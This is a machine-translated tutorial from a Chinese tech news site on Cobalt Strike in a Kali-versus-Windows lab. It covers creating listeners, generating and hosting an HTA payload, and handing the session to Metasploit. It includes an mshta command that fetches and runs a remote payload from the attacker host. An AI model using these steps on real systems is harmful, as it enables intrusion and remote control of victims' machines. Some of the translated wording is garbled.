Shulou(Shulou.com)05/31 Report--

This article mainly introduces how to use cobaltstrike interface to transfer shell in msf. It is very detailed and has certain reference value. Friends who are interested must read it!

Cobalt Strike is a Metasploit-based GUI framework penetration testing tool that integrates port forwarding, service scanning, automatic overflow, multi-mode port snooping, exe, powershell Trojan generation, etc. There are many functions, and the article only talks about the core functions of the tool.

Penetration machine: kali, target machine: ws08.

Kali:172.16.1.34

Ws08:172.16.1.24

Script for expanding the application of agscript

Clint checks profile for error messages

Teamserver server program

Cobaltstrike client program

Cobaltstrike.jar (java Cross-platform) client

Logs directory records information with the target host

Third-party third-party tools

Start the server

Execute. / teamserver 172.16.1.34 p@ssw0rd

Do not close the window, and then start the cobalt strike connection locally to test the client connection

Enumerate users

User communication

/ msg Ro0t xxxxxx

The above is how to start and operate. Let's take a look at the cobaltstrike listening module.

Beacon is a built-in listener for cs. You need to execute the corresponding payload on the target machine to obtain the shell into the cs. Including smb,DNS, HTTP and other modules

=

Windows/beacon_http/reverse_dns_txt

Windows/beacon_http/reverse_http x86/x64

There are many modules, which are not listed here.

Foreigh is an external listener, which is mainly used for msf combination, such as getting meterpreter to shell.

=

Add a Listener to the cobalt strike to create a beacon Listener

Create Foreign Listener

Save, click Attack,packages,HTML Application in the main configuration menu

Select the generation and method of Listener. There are three executable files: powershell,vba and exe.

Select ps, save it to the desktop,

Click Attacks,webdirve-by,hostfile in turn and open the connection channel through web service

Then find the file in the pop-up window, click the folder button, find the malicious script .hta that needs to be added, and click launch to start the web service module.

At this point, we view the log information and prompt us to access the link in the target client.

Go back to the target machine, open the terminal and use the command mshta.exe http://172.16.1.34:80/download/file.txt command

Kali view, a new connection has been established

By default, there is a heartbeat line of 60s linked here, and the interval can be adjusted appropriately to avoid excessive traffic.

Right-click the session and select interact to open the interactive session terminal

You can check the current permissions, you can use getsystem to try to raise rights.

Open a new terminal, enter msf to set a listening load, lhost to set the cost of ip, and then expliit-j

Back in cobalt, right-click spawn to generate a new listener. Then click add in the pop-up window to add a new listener

When the listening is set, enter the msf terminal to pass the shell of cobaltstrike

When you go back to msf, you can find that a conversation has been established with the target plane.

The above is all the contents of the article "how to use the cobaltstrike interface to transfer shell in msf". Thank you for reading! Hope to share the content to help you, more related knowledge, welcome to follow the industry information channel!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.